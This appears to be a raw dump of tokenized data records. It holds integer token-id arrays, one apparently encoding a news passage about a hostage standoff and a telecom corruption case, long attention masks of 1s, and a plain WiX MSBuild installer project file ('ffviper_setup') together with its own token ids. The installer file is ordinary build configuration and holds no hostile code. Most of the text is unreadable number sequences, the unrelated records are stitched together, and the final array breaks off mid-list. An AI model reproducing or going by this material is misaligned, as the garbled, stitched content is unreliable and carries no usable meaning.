29889, 13, 13, 26222, 278, 1899, 359, 1855, 3368, 393, 896, 750, 304, 937, 679, 278, 6114, 322, 278, 2211, 4344, 714, 29892, 896, 6363, 445, 471, 2675, 304, 367, 263, 1472, 5858, 393, 723, 2099, 260, 8491, 714, 278, 1023, 1757, 2768, 1549, 27044, 287, 27214, 800, 29889, 2688, 892, 623, 9003, 6270, 393, 278, 4344, 1122, 679, 885, 1965, 1363, 310, 278, 13736, 845, 1862, 29889, 2823, 292, 263, 2181, 328, 280, 2768, 278, 3699, 1549, 263, 3474, 9613, 963, 1363, 565, 697, 310, 278, 4344, 471, 385, 28056, 29892, 372, 723, 752, 5926, 278, 5858, 29889, 2688, 892, 884, 9644, 545, 310, 278, 2924, 310, 626, 24579, 654, 278, 1023, 1757, 750, 411, 963, 29889, 13, 13, 30015, 3644, 727, 471, 694, 697, 1683, 29892, 372, 723, 367, 263, 5320, 29899, 1195, 1082, 4982, 29889, 1205, 411, 278, 13331, 310, 385, 28056, 29892, 591, 1033, 451, 2125, 738, 521, 2925, 3995, 1497, 385, 12139, 29889, 450, 3815, 1497, 896, 526, 16370, 304, 2125, 373, 23926, 15115, 2879, 577, 25340, 411, 963, 9007, 30010, 29873, 263, 5932, 29889, 739, 471, 871, 278, 13331, 310, 263, 3495, 482, 24161, 393, 2825, 27455, 1372, 297, 278, 3458, 29889, 13, 13, 1576, 3815, 750, 10664, 599, 1950, 429, 1169, 29892, 411, 17924, 5807, 666, 414, 2602, 287, 472, 8210, 7600, 29889, 450, 16392, 471, 304, 10446, 29892, 451, 304, 12088, 29889, 9788, 29892, 278, 28121, 7234, 1472, 2686, 479, 9698, 411, 278, 1023, 1757, 27503, 292, 304, 278, 10974, 29889, 13, 13, 1576, 381, 10122, 577, 3802, 304, 278, 27810, 398, 2883, 17567, 731, 1283, 21200, 289, 10071, 7148, 411, 278, 5032, 7184, 1862, 485, 2232, 6257, 472, 278, 14653, 457, 22819, 4821, 411, 278, 360, 375, 11734, 336, 16005, 29889, 28246, 4097, 674, 1286, 1018, 304, 410, 915, 278, 14188, 896, 29156, 3192, 297, 2645, 278, 4832, 7378, 896, 27661, 297, 349, 4774, 332, 304, 1284, 714, 565, 896, 892, 701, 304, 1554, 470, 925, 773, 278, 931, 304, 12528, 1009, 540, 1379, 1156, 278, 1023, 14741, 297, 14320, 284, 487, 322, 317, 12698, 29889, 13, 13, 1576, 377, 391, 19982, 13609, 1058, 10767, 29893, 278, 17343, 1283, 278, 7035, 4382, 6710, 14523, 472, 278, 25488, 310, 8373, 273, 333, 2918, 1085, 273, 6631, 411, 8991, 5648, 29892, 1286, 6625, 1169, 29871, 29906, 29954, 260, 2365, 287, 4642, 7761, 4382, 510, 11050, 319, 390, 9919, 411, 14060, 292, 372, 1156, 278, 1085, 550, 892, 9892, 3276, 491, 27692, 29968, 16967, 1279, 341, 3467, 348, 273, 333, 2918, 29889, 1346, 3112, 471, 390, 9919, 1058, 14511, 630, 278, 25501, 16129, 2750, 278, 16831, 287, 599, 327, 358, 310, 29871, 29941, 29906, 29941, 306, 7230, 29940, 9008, 12368, 304, 4642, 7761, 9699, 510, 7668, 8373, 273, 333, 2918, 1085, 273, 1156, 278, 1085, 550, 8379, 714, 411, 278, 27692, 29968, 30010, 29879, 937, 3942, 297, 29871, 29906, 29900, 29900, 29955, 3995, 17049, 315, 476, 5792, 20595, 273, 29892, 20723, 29891, 2498, 28274, 310, 278, 3086, 20438, 310, 9699, 510, 7361, 2376, 12712, 313, 9851, 25103, 29897, 7761, 29889, 13, 13, 11309, 20595, 273, 29892, 1058, 756, 1063, 17935, 3240, 19211, 23633, 2861, 304, 28235, 17119, 3821, 8469, 886, 363, 1346, 12443, 1572, 29877, 292, 30024, 278, 350, 19296, 29931, 9087, 2498, 8455, 30010, 29879, 8034, 29892, 1497, 372, 471, 390, 9919, 1058, 750, 10372, 385, 25501, 16129, 2750, 278, 1085, 550, 408, 727, 471, 263, 7233, 4024, 347, 1206, 29889, 739, 471, 297, 29871, 29906, 29900, 29900, 29955, 393, 278, 315, 12809, 750, 18397, 278, 3461, 373, 278, 599, 327, 358, 310, 29871, 29941, 29906, 29941, 306, 7230, 29940, 9008, 12368, 29889, 2398, 29892, 727, 471, 694, 6728, 2748, 278, 3942, 337, 13094, 3614, 2058, 29889, 13, 13, 30015, 10454, 29892, 278, 315, 12809, 338, 5622, 3158, 1156, 4832, 2440, 3995, 1497, 278, 11302, 9833, 11822, 29892, 1058, 24432, 393, 278, 1024, 310, 9172, 273, 333, 2918, 1085, 273, 29892, 278, 8991, 8527, 289, 2209, 29892, 367, 5134, 297, 278, 383, 8193, 29889, 1346, 29968, 284, 273, 333, 2918, 1085, 273, 881, 884, 367, 3143, 287, 408, 540, 338, 278, 14419, 7795, 1654, 653, 310, 278, 14523, 885, 314, 3995, 540, 28705, 29889, 1346, 29902, 471, 1809, 839, 714, 29889, 806, 5564, 29892, 306, 1258, 471, 304, 9437, 24024, 538, 278, 4066, 310, 350, 19296, 29931, 3995, 540, 5429, 14657, 29889, 25065, 29892, 278, 350, 19296, 29931, 1497, 372, 723, 3867, 3240, 19211, 23633, 304, 5792, 20595, 273, 29892, 871, 1156, 278, 17119, 3821, 28648, 892, 8676, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
<?xml version="1.0" encoding="utf-8"?> <Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> <PropertyGroup> <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration> <Platform Condition=" '$(Platform)' == '' ">x86</Platform> <ProductVersion>3.5</ProductVersion> <ProjectGuid>{89b4a6ba-5e99-48a8-8d73-7ff1669834a9}</ProjectGuid> <SchemaVersion>2.0</SchemaVersion> <OutputName>ffviper_setup</OutputName> <OutputType>Package</OutputType> <WixTargetsPath Condition=" '$(WixTargetsPath)' == '' AND '$(MSBuildExtensionsPath32)' != '' ">$(MSBuildExtensionsPath32)\Microsoft\WiX\v3.x\Wix.targets</WixTargetsPath> <WixTargetsPath Condition=" '$(WixTargetsPath)' == '' ">$(MSBuildExtensionsPath)\Microsoft\WiX\v3.x\Wix.targets</WixTargetsPath> </PropertyGroup> <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|x86' "> <OutputPath>bin\$(Configuration)\</OutputPath> <IntermediateOutputPath>obj\$(Configuration)\</IntermediateOutputPath> <DefineConstants>Debug</DefineConstants> <SuppressValidation>True</SuppressValidation> <Cultures>de-DE</Cultures> </PropertyGroup> <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|x86' "> <OutputPath>..\..\pkg\$(Configuration)\</OutputPath> <IntermediateOutputPath>obj\$(Configuration)\</IntermediateOutputPath> <SuppressValidation>True</SuppressValidation> <Cultures>en-US</Cultures> <SuppressPdbOutput>False</SuppressPdbOutput> </PropertyGroup> <ItemGroup> <Compile Include="product.wxs" /> </ItemGroup> <ItemGroup> <WixExtension Include="WixUIExtension"> <HintPath>$(WixExtDir)\WixUIExtension.dll</HintPath> <Name>WixUIExtension</Name> </WixExtension> </ItemGroup> <ItemGroup> <EmbeddedResource Include="strings1.wxl" /> <EmbeddedResource Include="strings2.wxl" /> </ItemGroup> <Import Project="$(WixTargetsPath)" /> </Project>
[ 1, 29871, 30143, 8169, 3134, 1873, 543, 29896, 29889, 29900, 29908, 8025, 543, 9420, 29899, 29947, 18943, 13, 29966, 7653, 27564, 6594, 543, 29946, 29889, 29900, 29908, 13109, 8667, 29879, 543, 8893, 29908, 9463, 543, 1124, 597, 11993, 29889, 4994, 29889, 510, 29914, 6734, 29914, 1516, 4282, 29914, 29906, 29900, 29900, 29941, 1013, 13, 29871, 529, 4854, 4782, 29958, 13, 1678, 529, 8614, 11790, 654, 543, 525, 12330, 8614, 16029, 1275, 6629, 376, 29958, 11862, 829, 8614, 29958, 13, 1678, 529, 21889, 11790, 654, 543, 525, 12330, 21889, 16029, 1275, 6629, 376, 29958, 29916, 29947, 29953, 829, 21889, 29958, 13, 1678, 529, 7566, 6594, 29958, 29941, 29889, 29945, 829, 7566, 6594, 29958, 13, 1678, 529, 7653, 29954, 5416, 26208, 29947, 29929, 29890, 29946, 29874, 29953, 2291, 29899, 29945, 29872, 29929, 29929, 29899, 29946, 29947, 29874, 29947, 29899, 29947, 29881, 29955, 29941, 29899, 29955, 600, 29896, 29953, 29953, 29929, 29947, 29941, 29946, 29874, 29929, 16040, 7653, 29954, 5416, 29958, 13, 1678, 529, 12763, 6594, 29958, 29906, 29889, 29900, 829, 12763, 6594, 29958, 13, 1678, 529, 6466, 1170, 29958, 600, 1403, 546, 29918, 14669, 829, 6466, 1170, 29958, 13, 1678, 529, 6466, 1542, 29958, 14459, 829, 6466, 1542, 29958, 13, 1678, 529, 29956, 861, 8667, 29879, 2605, 11790, 654, 543, 525, 12330, 29956, 861, 8667, 29879, 2605, 16029, 1275, 6629, 5300, 525, 12330, 29924, 1744, 29884, 789, 26982, 2605, 29941, 29906, 16029, 2804, 6629, 376, 29958, 12330, 29924, 1744, 29884, 789, 26982, 2605, 29941, 29906, 2144, 11277, 29905, 29956, 29875, 29990, 29905, 29894, 29941, 29889, 29916, 29905, 29956, 861, 29889, 5182, 29879, 829, 29956, 861, 8667, 29879, 2605, 29958, 13, 1678, 529, 29956, 861, 8667, 29879, 2605, 11790, 654, 543, 525, 12330, 29956, 861, 8667, 29879, 2605, 16029, 1275, 6629, 376, 29958, 12330, 29924, 1744, 29884, 789, 26982, 2605, 2144, 11277, 29905, 29956, 29875, 29990, 29905, 29894, 29941, 29889, 29916, 29905, 29956, 861, 29889, 5182, 29879, 829, 29956, 861, 8667, 29879, 2605, 29958, 13, 29871, 1533, 4854, 4782, 29958, 13, 29871, 529, 4854, 4782, 11790, 654, 543, 525, 12330, 8614, 10531, 12330, 21889, 16029, 1275, 525, 11862, 29989, 29916, 29947, 29953, 29915, 376, 29958, 13, 1678, 529, 6466, 2605, 29958, 2109, 29905, 12330, 8614, 2144, 829, 6466, 2605, 29958, 13, 1678, 529, 4074, 13847, 6466, 2605, 29958, 5415, 29905, 12330, 8614, 2144, 829, 4074, 13847, 6466, 2605, 29958, 13, 1678, 529, 3206, 457, 26570, 29958, 11862, 829, 3206, 457, 26570, 29958, 13, 1678, 529, 20182, 1253, 19448, 29958, 5574, 829, 20182, 1253, 19448, 29958, 13, 1678, 529, 29907, 499, 1973, 29958, 311, 29899, 2287, 829, 29907, 499, 1973, 29958, 13, 29871, 1533, 4854, 4782, 29958, 13, 29871, 529, 4854, 4782, 11790, 654, 543, 525, 12330, 8614, 10531, 12330, 21889, 16029, 1275, 525, 19729, 29989, 29916, 29947, 29953, 29915, 376, 29958, 13, 1678, 529, 6466, 2605, 29958, 636, 29905, 636, 29905, 15865, 29905, 12330, 8614, 2144, 829, 6466, 2605, 29958, 13, 1678, 529, 4074, 13847, 6466, 2605, 29958, 5415, 29905, 12330, 8614, 2144, 829, 4074, 13847, 6466, 2605, 29958, 13, 1678, 529, 20182, 1253, 19448, 29958, 5574, 829, 20182, 1253, 19448, 29958, 13, 1678, 529, 29907, 499, 1973, 29958, 264, 29899, 3308, 829, 29907, 499, 1973, 29958, 13, 1678, 529, 20182, 1253, 29925, 2585, 6466, 29958, 8824, 829, 20182, 1253, 29925, 2585, 6466, 29958, 13, 29871, 1533, 4854, 4782, 29958, 13, 29871, 529, 2001, 4782, 29958, 13, 1678, 529, 6843, 488, 512, 2325, 543, 4704, 29889, 29893, 10351, 29908, 2900, 13, 29871, 1533, 2001, 4782, 29958, 13, 29871, 529, 2001, 4782, 29958, 13, 1678, 529, 29956, 861, 17657, 512, 2325, 543, 29956, 861, 3120, 17657, 1013, 13, 418, 529, 28016, 2605, 29958, 12330, 29956, 861, 5647, 9170, 2144, 29956, 861, 3120, 17657, 29889, 12396, 829, 28016, 2605, 29958, 13, 418, 529, 1170, 29958, 29956, 861, 3120, 17657, 829, 1170, 29958, 13, 1678, 1533, 29956, 861, 17657, 29958, 13, 29871, 1533, 2001, 4782, 29958, 13, 29871, 529, 2001, 4782, 29958, 13, 1678, 529, 6026, 2580, 7176, 6848, 512, 2325, 543, 19651, 29896, 29889, 29893, 15524, 29908, 2900, 13, 1678, 529, 6026, 2580, 7176, 6848, 512, 2325, 543, 19651, 29906, 29889, 29893, 15524, 29908, 2900, 13, 29871, 1533, 2001, 4782, 29958, 13, 29871, 529, 17518, 8010, 543, 12330, 29956, 861, 8667, 29879, 2605, 5513, 2900, 13, 829, 7653, 29958 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 